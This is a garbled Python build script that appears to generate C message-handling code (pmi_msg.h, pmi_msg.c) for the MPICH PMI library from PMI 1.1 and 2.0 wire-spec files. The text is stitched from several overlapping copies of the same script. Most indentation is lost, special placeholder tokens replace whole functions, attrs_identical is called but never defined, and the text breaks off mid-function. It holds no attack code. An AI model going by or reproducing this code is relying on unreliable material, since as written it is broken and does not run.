RE.m = re.search(pat, str, flags)
return RE.m
def main():
load_pmi_txt('maint/pmi-1.1.txt', '1.1')
load_pmi_txt('maint/pmi-2.0.txt', '2.0')
dump_all()
<|reserved_special_token_0|>
def dump_all():
def dump_enums(Out):
print('enum PMIU_CMD_ID {', file=Out)
print(' PMIU_CMD_INVALID,', file=Out)
for NAME in G.cmd_list:
print(' PMIU_CMD_%s,' % NAME, file=Out)
print('};', file=Out)
print('', file=Out)
def dump_decls(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if 'query-name' in v0:
if len(v0['query-attrs']):
params = get_set_params(v0['query-attrs'])
decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (
name, std_query, params))
params = get_get_params(v0['query-attrs'])
decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (
name, std_get, params))
if 'response-name' in v0:
if len(v0['response-attrs']):
params = get_set_params(v0['response-attrs'])
decls.append('int PMIU_msg_set_response_%s(%s, %s);' %
(name, std_response, params))
params = get_get_params(v0['response-attrs'])
decls.append('int PMIU_msg_get_response_%s(%s, %s);' %
(name, std_get, params))
if len(decls):
print('/* PMIU_CMD_%s */' % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)
print('{', file=Out)
t_if = ' if'
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and 'query-name' in v[NAME]:
t = v[NAME]['query-name']
if t not in prev:
cmp_list.append('strcmp(cmd, "%s") == 0' % t)
prev[t] = 1
if len(cmp_list):
print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)
print(' return PMIU_CMD_%s;' % NAME, file=Out)
t_if = ' } else if'
print(' } else {', file=Out)
print(' return PMIU_CMD_INVALID;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_str(Out, query):
namekey = query + '-name'
print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %
query, file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(' case PMIU_CMD_%s:' % NAME, file=Out)
if len(cmp_list) == 1:
print(' return "%s";' % cmp_list[0], file=Out)
else:
print(
' return (version == PMIU_WIRE_V1) ? "%s" : "%s";'
% (cmp_list[0], cmp_list[1]), file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_response(Out):
print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',
file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_funcs(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
def dump_if_version(t_if, version, is_set, is_query):
if re.match('1\\.', version):
ver = 'PMIU_WIRE_V1'
else:
ver = 'PMIU_WIRE_V2'
if is_set:
if is_query:
print(t_if + ' (version == %s) {' % ver, file=Out)
else:
print(t_if + ' (pmi_query->version == %s) {' % ver,
file=Out)
else:
print(t_if + ' (pmi->version == %s) {' % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = 'pmi_query'
else:
pmi = 'pmi_resp'
if a[1] == 'INTEGER':
kind = 'int'
elif a[1] == 'STRING':
kind = 'str'
elif a[1] == 'BOOLEAN':
kind = 'bool'
else:
raise Exception('Unhandled kind: ' + a[1])
if is_set:
pmiu = 'PMIU_cmd_add_' + kind
print(spaces + '%s(%s, "%s", %s);' % (pmiu, pmi, a[0],
var), file=Out)
elif RE.match('.*optional=(\\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s, %s);' % (pmiu, a[0],
var, dflt), file=Out)
else:
pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s);' % (pmiu, a[0], var
), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print('', file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print('void PMIU_msg_set_query_%s(%s, %s)' % (name,
std_query, params), file=Out)
else:
print('int PMIU_msg_set_response_%s(%s, %s)' % (name,
std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print('int PMIU_msg_get_query_%s(%s, %s)' % (name,
std_get, params), file=Out)
else:
print('int PMIU_msg_get_response_%s(%s, %s)' % (name,
std_get, params), file=Out)
print('{', file=Out)
if ret_errno:
print(' int pmi_errno = PMIU_SUCCESS;', file=Out)
print('', file=Out)
if is_set:
if is_query:
print(
' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'
% NAME, file=Out)
else:
print(
' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %
NAME, file=Out)
print(
' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'
, file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]['query-attrs']
else:
attrs_b = v_list[1]['response-attrs']
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(' ', is_set, is_query, attrs,
attrs)
else:
dump_if_version(' if', v_list[0]['version'], is_set,
is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs, attrs)
dump_if_version(' } else if', v_list[1]['version'],
is_set, is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs_b, attrs)
if ret_errno:
print(' } else {', file=Out)
print(
' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, "invalid version");'
, file=Out)
non_optional += 1
print(' }', file=Out)
if non_optional > 0:
print('', file=Out)
print(' fn_exit:', file=Out)
print(' return pmi_errno;', file=Out)
print(' fn_fail:', file=Out)
print(' goto fn_exit;', file=Out)
elif ret_errno:
print('', file=Out)
print(' return pmi_errno;', file=Out)
print('}', file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if 'query-name' in v0:
if len(v0['query-attrs']):
dump_it(NAME, v_list, True, True, v0['query-attrs'])
dump_it(NAME, v_list, False, True, v0['query-attrs'])
if 'response-name' in v0:
if len(v0['response-attrs']):
dump_it(NAME, v_list, True, False, v0['response-attrs'])
dump_it(NAME, v_list, False, False, v0['response-attrs'])
msg_h = 'src/pmi_msg.h'
msg_c = 'src/pmi_msg.c'
with open(msg_h, 'w') as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
print('#ifndef %s' % INC, file=Out)
print('#define %s' % INC, file=Out)
print('', file=Out)
dump_enums(Out)
print('', file=Out)
dump_decls(Out)
print('', file=Out)
print('#endif /* %s */' % INC, file=Out)
with open(msg_c, 'w') as Out:
dump_copyright(Out)
for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',
'pmi_wire', 'pmi_msg']:
print('#include "%s.h"\n' % inc, file=Out)
dump_cmd_to_id(Out)
print('', file=Out)
dump_id_to_str(Out, 'query')
print('', file=Out)
dump_id_to_str(Out, 'response')
print('', file=Out)
dump_funcs(Out)
def get_set_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
tlist.append(get_kind(a[1]) + get_var(a[0]))
return ', '.join(tlist)
<|reserved_special_token_0|>
def get_var(name):
return name.replace('-', '_')
def get_kind(kind):
if kind == 'INTEGER':
return 'int '
elif kind == 'STRING':
return 'const char *'
elif kind == 'BOOLEAN':
return 'bool '
else:
raise Exception('unexpected kind ' + kind)
<|reserved_special_token_0|>
def dump_copyright(out):
print('/*', file=out)
print(' * Copyright (C) by Argonne National Laboratory', file=out)
print(' * See COPYRIGHT in top-level directory', file=out)
print(' */', file=out)
print('', file=out)
print('/* ** This file is auto-generated, do not edit ** */', file=out)
print('', file=out)
def get_include_guard(h_file):
h_file = re.sub('.*\\/', '', h_file)
h_file = re.sub('\\.', '_', h_file)
return h_file.upper() + '_INCLUDED'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class G:
pmi_vers = []
cmd_list = []
cmd_hash = {}
class RE:
m = None
def match(pat, str, flags=0):
RE.m = re.match(pat, str, flags)
return RE.m
def search(pat, str, flags=0):
RE.m = re.search(pat, str, flags)
return RE.m
def main():
load_pmi_txt('maint/pmi-1.1.txt', '1.1')
load_pmi_txt('maint/pmi-2.0.txt', '2.0')
dump_all()
def load_pmi_txt(pmi_txt, ver):
cur_hash = {'version': ver}
G.pmi_vers.append(cur_hash)
prev_cmd = None
cur_cmd = None
cur_attrs = None
with open(pmi_txt, 'r') as In:
for line in In:
if RE.match('([A-Z]+):', line):
name = RE.m.group(1)
cur_cmd = {'version': ver}
cur_hash[name] = cur_cmd
if name not in G.cmd_hash:
G.cmd_list.append(name)
G.cmd_hash[name] = cur_cmd
prev_cmd = None
else:
prev_cmd = G.cmd_hash[name]
elif RE.match('\\s+([QR]):\\s*([\\w-]+)(.*)', line):
QR, cmd, tail = RE.m.group(1, 2, 3)
cur_attrs = []
if QR == 'Q':
cur_cmd['query-name'] = cmd
if RE.match('.*wire=.+', tail):
cur_cmd['query-attrs'] = []
else:
cur_cmd['query-attrs'] = cur_attrs
else:
cur_cmd['response-name'] = cmd
cur_cmd['response-attrs'] = cur_attrs
elif RE.match('\\s+([\\w-]+):\\s*([A-Z]+)(.*)', line):
name, kind, tail = RE.m.group(1, 2, 3)
cur_attrs.append([name, kind, tail])
elif RE.match('\\s+([\\[\\]])', line):
cur_attrs.append(RE.m.group(1))
def dump_all():
def dump_enums(Out):
print('enum PMIU_CMD_ID {', file=Out)
print(' PMIU_CMD_INVALID,', file=Out)
for NAME in G.cmd_list:
print(' PMIU_CMD_%s,' % NAME, file=Out)
print('};', file=Out)
print('', file=Out)
def dump_decls(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if 'query-name' in v0:
if len(v0['query-attrs']):
params = get_set_params(v0['query-attrs'])
decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (
name, std_query, params))
params = get_get_params(v0['query-attrs'])
decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (
name, std_get, params))
if 'response-name' in v0:
if len(v0['response-attrs']):
params = get_set_params(v0['response-attrs'])
decls.append('int PMIU_msg_set_response_%s(%s, %s);' %
(name, std_response, params))
params = get_get_params(v0['response-attrs'])
decls.append('int PMIU_msg_get_response_%s(%s, %s);' %
(name, std_get, params))
if len(decls):
print('/* PMIU_CMD_%s */' % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)
print('{', file=Out)
t_if = ' if'
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and 'query-name' in v[NAME]:
t = v[NAME]['query-name']
if t not in prev:
cmp_list.append('strcmp(cmd, "%s") == 0' % t)
prev[t] = 1
if len(cmp_list):
print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)
print(' return PMIU_CMD_%s;' % NAME, file=Out)
t_if = ' } else if'
print(' } else {', file=Out)
print(' return PMIU_CMD_INVALID;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_str(Out, query):
namekey = query + '-name'
print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %
query, file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(' case PMIU_CMD_%s:' % NAME, file=Out)
if len(cmp_list) == 1:
print(' return "%s";' % cmp_list[0], file=Out)
else:
print(
' return (version == PMIU_WIRE_V1) ? "%s" : "%s";'
% (cmp_list[0], cmp_list[1]), file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_response(Out):
print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',
file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_funcs(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
def dump_if_version(t_if, version, is_set, is_query):
if re.match('1\\.', version):
ver = 'PMIU_WIRE_V1'
else:
ver = 'PMIU_WIRE_V2'
if is_set:
if is_query:
print(t_if + ' (version == %s) {' % ver, file=Out)
else:
print(t_if + ' (pmi_query->version == %s) {' % ver,
file=Out)
else:
print(t_if + ' (pmi->version == %s) {' % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = 'pmi_query'
else:
pmi = 'pmi_resp'
if a[1] == 'INTEGER':
kind = 'int'
elif a[1] == 'STRING':
kind = 'str'
elif a[1] == 'BOOLEAN':
kind = 'bool'
else:
raise Exception('Unhandled kind: ' + a[1])
if is_set:
pmiu = 'PMIU_cmd_add_' + kind
print(spaces + '%s(%s, "%s", %s);' % (pmiu, pmi, a[0],
var), file=Out)
elif RE.match('.*optional=(\\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s, %s);' % (pmiu, a[0],
var, dflt), file=Out)
else:
pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s);' % (pmiu, a[0], var
), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print('', file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print('void PMIU_msg_set_query_%s(%s, %s)' % (name,
std_query, params), file=Out)
else:
print('int PMIU_msg_set_response_%s(%s, %s)' % (name,
std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print('int PMIU_msg_get_query_%s(%s, %s)' % (name,
std_get, params), file=Out)
else:
print('int PMIU_msg_get_response_%s(%s, %s)' % (name,
std_get, params), file=Out)
print('{', file=Out)
if ret_errno:
print(' int pmi_errno = PMIU_SUCCESS;', file=Out)
print('', file=Out)
if is_set:
if is_query:
print(
' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'
% NAME, file=Out)
else:
print(
' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %
NAME, file=Out)
print(
' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'
, file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]['query-attrs']
else:
attrs_b = v_list[1]['response-attrs']
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(' ', is_set, is_query, attrs,
attrs)
else:
dump_if_version(' if', v_list[0]['version'], is_set,
is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs, attrs)
dump_if_version(' } else if', v_list[1]['version'],
is_set, is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs_b, attrs)
if ret_errno:
print(' } else {', file=Out)
print(
' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, "invalid version");'
, file=Out)
non_optional += 1
print(' }', file=Out)
if non_optional > 0:
print('', file=Out)
print(' fn_exit:', file=Out)
print(' return pmi_errno;', file=Out)
print(' fn_fail:', file=Out)
print(' goto fn_exit;', file=Out)
elif ret_errno:
print('', file=Out)
print(' return pmi_errno;', file=Out)
print('}', file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if 'query-name' in v0:
if len(v0['query-attrs']):
dump_it(NAME, v_list, True, True, v0['query-attrs'])
dump_it(NAME, v_list, False, True, v0['query-attrs'])
if 'response-name' in v0:
if len(v0['response-attrs']):
dump_it(NAME, v_list, True, False, v0['response-attrs'])
dump_it(NAME, v_list, False, False, v0['response-attrs'])
msg_h = 'src/pmi_msg.h'
msg_c = 'src/pmi_msg.c'
with open(msg_h, 'w') as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
print('#ifndef %s' % INC, file=Out)
print('#define %s' % INC, file=Out)
print('', file=Out)
dump_enums(Out)
print('', file=Out)
dump_decls(Out)
print('', file=Out)
print('#endif /* %s */' % INC, file=Out)
with open(msg_c, 'w') as Out:
dump_copyright(Out)
for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',
'pmi_wire', 'pmi_msg']:
print('#include "%s.h"\n' % inc, file=Out)
dump_cmd_to_id(Out)
print('', file=Out)
dump_id_to_str(Out, 'query')
print('', file=Out)
dump_id_to_str(Out, 'response')
print('', file=Out)
dump_funcs(Out)
def get_set_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
tlist.append(get_kind(a[1]) + get_var(a[0]))
return ', '.join(tlist)
def get_get_params(attrs):
tlist = []
for a in attrs:
if len(a) == 3:
tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))
return ', '.join(tlist)
def get_var(name):
return name.replace('-', '_')
def get_kind(kind):
if kind == 'INTEGER':
return 'int '
elif kind == 'STRING':
return 'const char *'
elif kind == 'BOOLEAN':
return 'bool '
else:
raise Exception('unexpected kind ' + kind)
<|reserved_special_token_0|>
def dump_copyright(out):
print('/*', file=out)
print(' * Copyright (C) by Argonne National Laboratory', file=out)
print(' * See COPYRIGHT in top-level directory', file=out)
print(' */', file=out)
print('', file=out)
print('/* ** This file is auto-generated, do not edit ** */', file=out)
print('', file=out)
def get_include_guard(h_file):
h_file = re.sub('.*\\/', '', h_file)
h_file = re.sub('\\.', '_', h_file)
return h_file.upper() + '_INCLUDED'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import re
import os
class G:
    """Module-global parse state shared by load_pmi_txt() and dump_all()."""
    pmi_vers = []  # one dict per spec file: {'version': ..., NAME: cmd-dict, ...}
    cmd_list = []  # command NAMEs in first-seen order (drives output ordering)
    cmd_hash = {}  # NAME -> cmd-dict from the first version that defined it
class RE:
    """Tiny re wrapper that remembers the last match object in RE.m.

    Meant to be called on the class itself (RE.match(...)); the methods
    deliberately take no self parameter.
    """
    m = None  # last match object produced by match()/search()

    def match(pat, str, flags=0):
        """re.match that also stores the result in RE.m."""
        RE.m = re.match(pat, str, flags)
        return RE.m

    def search(pat, str, flags=0):
        """re.search that also stores the result in RE.m."""
        RE.m = re.search(pat, str, flags)
        return RE.m
def main():
    """Generate src/pmi_msg.{h,c} from the v1.1 and v2.0 wire specs."""
    # paths are relative: intended to be run from the pmi top_srcdir
    load_pmi_txt('maint/pmi-1.1.txt', '1.1')
    load_pmi_txt('maint/pmi-2.0.txt', '2.0')
    dump_all()
def load_pmi_txt(pmi_txt, ver):
    """Parse one PMI wire spec file into G.pmi_vers / G.cmd_list / G.cmd_hash.

    Recognized line shapes:
      "NAME:"            -- start of a command block
      "  Q: cmd ..."     -- query wire name ("R:" for the response)
      "  attr: KIND ..." -- one attribute of the current Q/R section
      "  [" or "  ]"     -- optional-group bracket, stored as a bare string
    """
    cur_hash = {'version': ver}
    G.pmi_vers.append(cur_hash)
    # NOTE(review): prev_cmd is assigned below but never read -- looks like a
    # dead local; confirm before removing.
    prev_cmd = None
    cur_cmd = None
    cur_attrs = None
    with open(pmi_txt, 'r') as In:
        for line in In:
            if RE.match('([A-Z]+):', line):
                # command header line
                name = RE.m.group(1)
                cur_cmd = {'version': ver}
                cur_hash[name] = cur_cmd
                if name not in G.cmd_hash:
                    # the first version to define a command owns the canonical entry
                    G.cmd_list.append(name)
                    G.cmd_hash[name] = cur_cmd
                    prev_cmd = None
                else:
                    prev_cmd = G.cmd_hash[name]
            elif RE.match('\\s+([QR]):\\s*([\\w-]+)(.*)', line):
                # query (Q) or response (R) wire-command name
                QR, cmd, tail = RE.m.group(1, 2, 3)
                cur_attrs = []
                if QR == 'Q':
                    cur_cmd['query-name'] = cmd
                    if RE.match('.*wire=.+', tail):
                        # hand-coded wire format: record no attributes
                        cur_cmd['query-attrs'] = []
                    else:
                        cur_cmd['query-attrs'] = cur_attrs
                else:
                    cur_cmd['response-name'] = cmd
                    cur_cmd['response-attrs'] = cur_attrs
            elif RE.match('\\s+([\\w-]+):\\s*([A-Z]+)(.*)', line):
                # attribute line: name, KIND keyword, trailing options
                name, kind, tail = RE.m.group(1, 2, 3)
                cur_attrs.append([name, kind, tail])
            elif RE.match('\\s+([\\[\\]])', line):
                # bracket markers are appended as bare one-character strings
                cur_attrs.append(RE.m.group(1))
def dump_all():
def dump_enums(Out):
print('enum PMIU_CMD_ID {', file=Out)
print(' PMIU_CMD_INVALID,', file=Out)
for NAME in G.cmd_list:
print(' PMIU_CMD_%s,' % NAME, file=Out)
print('};', file=Out)
print('', file=Out)
def dump_decls(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
decls = []
if 'query-name' in v0:
if len(v0['query-attrs']):
params = get_set_params(v0['query-attrs'])
decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (
name, std_query, params))
params = get_get_params(v0['query-attrs'])
decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (
name, std_get, params))
if 'response-name' in v0:
if len(v0['response-attrs']):
params = get_set_params(v0['response-attrs'])
decls.append('int PMIU_msg_set_response_%s(%s, %s);' %
(name, std_response, params))
params = get_get_params(v0['response-attrs'])
decls.append('int PMIU_msg_get_response_%s(%s, %s);' %
(name, std_get, params))
if len(decls):
print('/* PMIU_CMD_%s */' % NAME, file=Out)
for l in decls:
print(l, file=Out)
def dump_cmd_to_id(Out):
print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)
print('{', file=Out)
t_if = ' if'
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and 'query-name' in v[NAME]:
t = v[NAME]['query-name']
if t not in prev:
cmp_list.append('strcmp(cmd, "%s") == 0' % t)
prev[t] = 1
if len(cmp_list):
print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)
print(' return PMIU_CMD_%s;' % NAME, file=Out)
t_if = ' } else if'
print(' } else {', file=Out)
print(' return PMIU_CMD_INVALID;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_str(Out, query):
namekey = query + '-name'
print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %
query, file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
for NAME in G.cmd_list:
cmp_list = []
prev = {}
for v in G.pmi_vers:
if NAME in v and namekey in v[NAME]:
t = v[NAME][namekey]
if t not in prev:
cmp_list.append(t)
prev[t] = 1
if len(cmp_list) > 0:
print(' case PMIU_CMD_%s:' % NAME, file=Out)
if len(cmp_list) == 1:
print(' return "%s";' % cmp_list[0], file=Out)
else:
print(
' return (version == PMIU_WIRE_V1) ? "%s" : "%s";'
% (cmp_list[0], cmp_list[1]), file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_id_to_response(Out):
print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',
file=Out)
print('{', file=Out)
print(' switch(cmd_id) {', file=Out)
print(' default:', file=Out)
print(' return NULL;', file=Out)
print(' }', file=Out)
print('}', file=Out)
def dump_funcs(Out):
std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'
std_response = (
'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'
)
std_get = 'struct PMIU_cmd *pmi'
def dump_if_version(t_if, version, is_set, is_query):
if re.match('1\\.', version):
ver = 'PMIU_WIRE_V1'
else:
ver = 'PMIU_WIRE_V2'
if is_set:
if is_query:
print(t_if + ' (version == %s) {' % ver, file=Out)
else:
print(t_if + ' (pmi_query->version == %s) {' % ver,
file=Out)
else:
print(t_if + ' (pmi->version == %s) {' % ver, file=Out)
def dump_attrs(spaces, is_set, is_query, attrs, attrs0):
non_optional = 0
for i in range(len(attrs)):
a = attrs[i]
var = get_var(attrs0[i][0])
if is_query:
pmi = 'pmi_query'
else:
pmi = 'pmi_resp'
if a[1] == 'INTEGER':
kind = 'int'
elif a[1] == 'STRING':
kind = 'str'
elif a[1] == 'BOOLEAN':
kind = 'bool'
else:
raise Exception('Unhandled kind: ' + a[1])
if is_set:
pmiu = 'PMIU_cmd_add_' + kind
print(spaces + '%s(%s, "%s", %s);' % (pmiu, pmi, a[0],
var), file=Out)
elif RE.match('.*optional=(\\S+)', a[2]):
dflt = RE.m.group(1)
pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s, %s);' % (pmiu, a[0],
var, dflt), file=Out)
else:
pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()
print(spaces + '%s(pmi, "%s", *%s);' % (pmiu, a[0], var
), file=Out)
non_optional += 1
return non_optional
def dump_it(NAME, v_list, is_set, is_query, attrs):
print('', file=Out)
ret_errno = True
if is_set:
params = get_set_params(attrs)
if is_query:
ret_errno = False
print('void PMIU_msg_set_query_%s(%s, %s)' % (name,
std_query, params), file=Out)
else:
print('int PMIU_msg_set_response_%s(%s, %s)' % (name,
std_response, params), file=Out)
else:
params = get_get_params(attrs)
if is_query:
print('int PMIU_msg_get_query_%s(%s, %s)' % (name,
std_get, params), file=Out)
else:
print('int PMIU_msg_get_response_%s(%s, %s)' % (name,
std_get, params), file=Out)
print('{', file=Out)
if ret_errno:
print(' int pmi_errno = PMIU_SUCCESS;', file=Out)
print('', file=Out)
if is_set:
if is_query:
print(
' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'
% NAME, file=Out)
else:
print(
' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %
NAME, file=Out)
print(
' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'
, file=Out)
attrs_b = None
if len(v_list) > 1:
if is_query:
attrs_b = v_list[1]['query-attrs']
else:
attrs_b = v_list[1]['response-attrs']
non_optional = 0
if attrs_b is None or attrs_identical(attrs, attrs_b):
non_optional += dump_attrs(' ', is_set, is_query, attrs,
attrs)
else:
dump_if_version(' if', v_list[0]['version'], is_set,
is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs, attrs)
dump_if_version(' } else if', v_list[1]['version'],
is_set, is_query)
non_optional += dump_attrs(' ', is_set, is_query,
attrs_b, attrs)
if ret_errno:
print(' } else {', file=Out)
print(
' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, "invalid version");'
, file=Out)
non_optional += 1
print(' }', file=Out)
if non_optional > 0:
print('', file=Out)
print(' fn_exit:', file=Out)
print(' return pmi_errno;', file=Out)
print(' fn_fail:', file=Out)
print(' goto fn_exit;', file=Out)
elif ret_errno:
print('', file=Out)
print(' return pmi_errno;', file=Out)
print('}', file=Out)
for NAME in G.cmd_list:
name = NAME.lower()
v_list = []
for v in G.pmi_vers:
if NAME in v:
v_list.append(v[NAME])
v0 = v_list[0]
if 'query-name' in v0:
if len(v0['query-attrs']):
dump_it(NAME, v_list, True, True, v0['query-attrs'])
dump_it(NAME, v_list, False, True, v0['query-attrs'])
if 'response-name' in v0:
if len(v0['response-attrs']):
dump_it(NAME, v_list, True, False, v0['response-attrs'])
dump_it(NAME, v_list, False, False, v0['response-attrs'])
msg_h = 'src/pmi_msg.h'
msg_c = 'src/pmi_msg.c'
with open(msg_h, 'w') as Out:
dump_copyright(Out)
INC = get_include_guard(msg_h)
print('#ifndef %s' % INC, file=Out)
print('#define %s' % INC, file=Out)
print('', file=Out)
dump_enums(Out)
print('', file=Out)
dump_decls(Out)
print('', file=Out)
print('#endif /* %s */' % INC, file=Out)
with open(msg_c, 'w') as Out:
dump_copyright(Out)
for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',
'pmi_wire', 'pmi_msg']:
print('#include "%s.h"\n' % inc, file=Out)
dump_cmd_to_id(Out)
print('', file=Out)
dump_id_to_str(Out, 'query')
